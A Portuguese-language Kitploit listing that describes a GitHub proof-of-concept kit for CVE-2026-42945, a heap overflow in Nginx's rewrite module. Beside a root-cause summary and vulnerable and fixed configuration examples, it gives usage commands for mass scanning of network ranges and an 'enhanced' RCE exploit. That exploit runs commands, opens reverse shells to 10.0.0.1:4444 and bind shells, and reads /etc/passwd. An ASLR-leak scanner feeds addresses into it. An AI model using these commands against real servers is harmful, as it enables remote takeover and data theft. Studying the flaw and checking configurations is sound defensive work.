Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42945 — CVE-2026-42945 Nginx Rift | Kitploit
Ferramentas/GitHubGitHub/liaoziqi-gzfls/cve-2026-42945
ReconhecimentoAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebFuzzingTestes de PenetraçãoDesenvolvimento de PayloadsExploração de Binários
GitHubliaoziqi-gzfls/cve-2026-42945

CVE-2026-42945

CVE-2026-42945 Nginx Rift

115há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
Compartilhar

CVE-2026-42945 Nginx Rift - Kit de PoC

Um kit abrangente de prova de conceito para CVE-2026-42945 (Nginx Rift), uma vulnerabilidade crítica de estouro de buffer no heap no módulo ngx_http_rewrite_module do Nginx.


Resumo da Vulnerabilidade

CampoDetalhes
ID do CVECVE-2026-42945
NomeNginx Rift
TipoEstouro de Buffer no Heap
Componentengx_http_rewrite_module
GravidadeCrítica (CVSS 9.2)
Versões afetadasNginx 0.6.27 - 1.30.0
Versões corrigidasNginx 1.30.1 / 1.31.0

Causa Raiz

A vulnerabilidade existe devido a um erro de cálculo de tamanho entre duas passadas internas ao processar regras de rewrite. Se uma configuração usar:

  • Capturas regex sem nome ($1, $2, etc.)
  • Combinadas com uma string de substituição contendo ?

O Nginx calcula incorretamente o tamanho do buffer necessário durante a primeira passada e grava além do buffer de heap alocado durante a segunda passada.

Exemplo de Configuração Vulnerável

server {
    # VULNERABLE: Unnamed capture ($1) + '?' in replacement
    location /api/ {
        rewrite ^/api/(.*)$ /v1/$1?version=2 last;
    }
}

Configuração Segura (Corrigida)

server {
    # SAFE: Named capture (?P<path>) replaces $1
    location /api/ {
        rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;
    }
}

Componentes do Kit

1. nginx_rift_poc.py - Ferramenta PoC Principal

Ferramenta de varredura de vulnerabilidades e exploração para alvo único.

Recursos:

  • Detectar a versão do Nginx a partir do cabeçalho Server
  • Verificar se a versão está na faixa vulnerável
  • Enviar payloads HTTP elaborados para disparar o estouro de heap
  • Gerar configurações de teste vulneráveis/seguras

Uso:

# Detect version and test vulnerability
python nginx_rift_poc.py -t target.example.com

# Test with custom payload
python nginx_rift_poc.py -t target.example.com -p "/api/AAAA...?x=1"

# HTTPS target
python nginx_rift_poc.py -t target.example.com --ssl -p 443

# Generate vulnerable test configuration
python nginx_rift_poc.py --gen-vuln-config > vuln.conf

# Generate safe (patched) configuration
python nginx_rift_poc.py --gen-safe-config > safe.conf

2. nginx_rift_scanner.py - Scanner em Lote

Scanner em lote para testar vários alvos simultaneamente.

Recursos:

  • Varredura multithread (50 threads por padrão)
  • Lista de alvos a partir de arquivo ou intervalo de rede CIDR
  • Saída em JSON para integração
  • Detecção automática de SSL na porta 443

Uso:

# Scan from target file (format: host:port per line)
python nginx_rift_scanner.py -f targets.txt -o results.json

# Scan single target
python nginx_rift_scanner.py -t example.com -p 443 --ssl

# Scan network range
python nginx_rift_scanner.py -t 192.168.1.0/24 -p 80,443,8080

# High-speed scan
python nginx_rift_scanner.py -f targets.txt --threads 100 -o results.json

Formato do arquivo de alvos:

# Comments start with #
192.168.1.1:80
192.168.1.2:443:ssl
example.com:8080

3. config_checker.py - Analisador de Configuração

Examina arquivos de configuração locais do Nginx em busca de padrões de rewrite vulneráveis.

Recursos:

  • Analisar nginx.conf e seguir as diretivas include
  • Detectar capturas sem nome com ? em strings de substituição
  • Suporte a correção automática (com backup)
  • Varredura recursiva de diretórios

Uso:

# Scan single file
python config_checker.py /etc/nginx/nginx.conf

# Scan directory recursively
python config_checker.py -d /etc/nginx/conf.d/

# Auto-fix vulnerable patterns (creates .bak backup)
python config_checker.py --fix /etc/nginx/nginx.conf

# Auto-detect common Nginx paths
python config_checker.py

4. enhanced_poc.py - PoC RCE Aprimorado

Ferramenta de exploração avançada baseada na pesquisa oficial do depthfirst, com suporte a múltiplos padrões de rewrite e modos de exploração.

Recursos:

  • Detectar automaticamente 8 padrões comuns de rewrite vulneráveis (/api/, /redirect/, /user/, etc.)
  • Suportar múltiplos caracteres de disparo de overflow (+, &, =, %)
  • Geração inteligente de payload com tamanho de overflow controlado
  • Múltiplos modos de exploração: cmd / shell / bind / read
  • Endereços base de heap/libc personalizados para ambientes com ASLR desativado
  • Construção dinâmica do corpo de spray com ngx_pool_cleanup_s falso

Uso:

# Auto-detect patterns and version
python enhanced_poc.py -t target.example.com --detect

# Execute command (ASLR off)
python enhanced_poc.py -t target.example.com --cmd "id > /tmp/pwned"

# Reverse shell
python enhanced_poc.py -t target.example.com --shell --listen-ip 10.0.0.1 --listen-port 4444

# Bind shell
python enhanced_poc.py -t target.example.com --bind --listen-port 5555

# Read remote file
python enhanced_poc.py -t target.example.com --read /etc/passwd

# Custom heap base (for ASLR-off targets)
python enhanced_poc.py -t target.example.com --cmd "whoami" --heap-base 0x555555554000

# Use & as overflow trigger
python enhanced_poc.py -t target.example.com --cmd "id" --escape-char "&"

Detalhes dos Modos de Exploração:

ModoDescriçãoSaída
cmdExecuta um único comando shellSaída do comando no alvo
shellAbre shell reversoConecta de volta a --listen-ip:listen-port
bindAbre shell bind no alvoEscuta na porta --listen-port do alvo
readLê arquivo do alvoConteúdo gravado em /tmp/nginx_rift_read

Configuração de Endereços (somente com ASLR desativado):

  • --heap-base: base do heap do alvo (ex.: 0x555555559000)
  • --libc-base: endereço base da libc (ex.: 0x7ffff77ba000)
  • --system-addr: endereço direto de system() (substitui libc-base)

5. aslr_leak_detector.py - Detector de Vazamentos de ASLR

Scanner abrangente para detectar vazamentos de informações que podem contornar a proteção ASLR.

Recursos:

  • Detecção de vazamentos em cabeçalhos HTTP (Server, X-Powered-By, etc.)
  • Análise de páginas de erro em busca de endereços de memória e stack traces
  • Sondagem de endpoints específicos do Nginx (/nginx_status, /actuator/*, etc.)
  • Detecção de vazamento de endereços de memória (ponteiros de 64 bits, endereços de heap/libc/stack)
  • Sondagem do layout do heap por meio de análise de tempo de resposta
  • Inferência do status do ASLR (ativado/desativado/fraco)
  • Integração direta com enhanced_poc.py via relatório JSON

Uso:

# Scan single target
python aslr_leak_detector.py -t target.example.com

# Scan with SSL
python aslr_leak_detector.py -t target.example.com -p 443 --ssl

# Scan from file, save report
python aslr_leak_detector.py -f targets.txt -p 80,443 -o leak_report.json

# Scan network range
python aslr_leak_detector.py -t 192.168.1.0/24 -p 80,443

# Quick scan mode
python aslr_leak_detector.py -t target.example.com --quick

Integração com o PoC Aprimorado:

# Step 1: Detect leaks
python aslr_leak_detector.py -t target.example.com -o leak.json

# Step 2: Use leaked addresses for exploit
python enhanced_poc.py -t target.example.com \
  --heap-base 0x555555559000 \
  --libc-base 0x7ffff77ba000 \
  --cmd "id"

Indicadores de Detecção de Vulnerabilidade

A ferramenta PoC identifica a vulnerabilidade por meio dos seguintes indicadores:

Baixar ferramenta